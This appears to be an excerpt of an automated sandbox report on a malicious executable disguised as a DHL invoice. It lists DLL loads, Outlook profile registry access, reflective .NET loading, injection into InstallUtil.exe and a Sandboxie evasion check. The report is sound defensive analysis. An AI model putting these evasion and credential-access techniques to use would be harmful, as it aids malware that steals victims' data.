              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, Bqdluhjaql.cs.Net Code: Nrdhcgaq System.AppDomain.Load(byte[])
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5f10000.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5f10000.7.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5f10000.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5f10000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5f10000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: Yara matchFile source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5e70000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2050649719.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05230828 push esp; ret 0_2_05230859
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0523CB64 push cs; retf 0_2_0523CB75
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C102F1 push es; iretd 0_2_05C102F7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9AC28 push eax; ret 4_2_05D9AC2A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9ABF6 push eax; ret 4_2_05D9AC2A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D92E78 push esp; iretd 4_2_05D92E79
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeFile created: \invoice dhl - awb 2024 e4001 - 0000731.exe
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeFile created: \invoice dhl - awb 2024 e4001 - 0000731.exeJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTR
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeMemory allocated: A10000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeMemory allocated: 2380000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeMemory allocated: 4380000 memory reserve | memory write watchJump to behavior
